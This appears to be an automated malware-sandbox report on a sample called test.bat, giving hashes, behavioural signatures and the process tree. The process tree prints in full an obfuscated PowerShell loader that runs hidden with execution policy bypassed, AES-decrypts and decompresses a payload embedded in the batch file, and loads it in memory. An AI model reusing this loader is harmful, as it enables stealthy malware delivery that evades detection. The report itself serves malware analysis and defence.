Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
01-02-2023 23:07
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win10-20220901-en
Behavioral task
behavioral2
Sample
test.bat
Resource
win7-20221111-en
General
-
Target
test.bat
-
Size
48KB
-
MD5
106c27af68b78b8670267a5eebfc8040
-
SHA1
a2bbfb23b51cb1f2bb213dfe410601bc7fa53875
-
SHA256
037565e9535d9521ad3ab3cfef0e6e91cad24b8e1cab83af7949dae67d95fb5c
-
SHA512
7de6b4f739f209c11cadee9360d5cb799b77bc5d4083b706a4d9bc21f501bb45e218715dbca6cd61811458b0efd190dba06dc04141650a48d91a305abf8e4600
-
SSDEEP
768:0oEB9ZEYgBM1D1gozT1RjnAKRc1pU9/gnEiCsfhh8pRA9buJsgsSxQ:jErqY7coz0JagnEtqh8pYbFgsSxQ
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
test.bat.exepid process 1784 test.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1432 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
test.bat.exepid process 1784 test.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
test.bat.exedescription pid process Token: SeDebugPrivilege 1784 test.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1432 wrote to memory of 1784 1432 cmd.exe test.bat.exe PID 1432 wrote to memory of 1784 1432 cmd.exe test.bat.exe PID 1432 wrote to memory of 1784 1432 cmd.exe test.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\test.bat.exe"test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $IDBqQ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($tScli in $IDBqQ) { if ($tScli.StartsWith(':: ')) { $NZVFu = $tScli.Substring(3); break; }; };$UPeLj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NZVFu);$OYivd = New-Object System.Security.Cryptography.AesManaged;$OYivd.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OYivd.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OYivd.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9jIvbQQrMXVTkWeSQpp2Gn0UtOPOB2NCbMxKhJ10/nw=');$OYivd.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('krrHd9BxMDg+kQ5ve/eVnA==');$mtmak = $OYivd.CreateDecryptor();$UPeLj = $mtmak.TransformFinalBlock($UPeLj, 0, $UPeLj.Length);$mtmak.Dispose();$OYivd.Dispose();$Tiyba = New-Object System.IO.MemoryStream(, $UPeLj);$sbkvz = New-Object System.IO.MemoryStream;$CwlxS = New-Object System.IO.Compression.GZipStream($Tiyba, [IO.Compression.CompressionMode]::Decompress);$CwlxS.CopyTo($sbkvz);$CwlxS.Dispose();$Tiyba.Dispose();$sbkvz.Dispose();$UPeLj = $sbkvz.ToArray();$nxXvq = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($UPeLj);$ZqEhy = $nxXvq.EntryPoint;$ZqEhy.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\test.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\test.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/1784-55-0x0000000000000000-mapping.dmp
-
memory/1784-57-0x000007FEFC311000-0x000007FEFC313000-memory.dmpFilesize
8KB
-
memory/1784-58-0x000007FEF3A50000-0x000007FEF4473000-memory.dmpFilesize
10.1MB
-
memory/1784-60-0x0000000002384000-0x0000000002387000-memory.dmpFilesize
12KB
-
memory/1784-59-0x000007FEF2EF0000-0x000007FEF3A4D000-memory.dmpFilesize
11.4MB
-
memory/1784-61-0x0000000002384000-0x0000000002387000-memory.dmpFilesize
12KB
-
memory/1784-62-0x000000000238B000-0x00000000023AA000-memory.dmpFilesize
124KB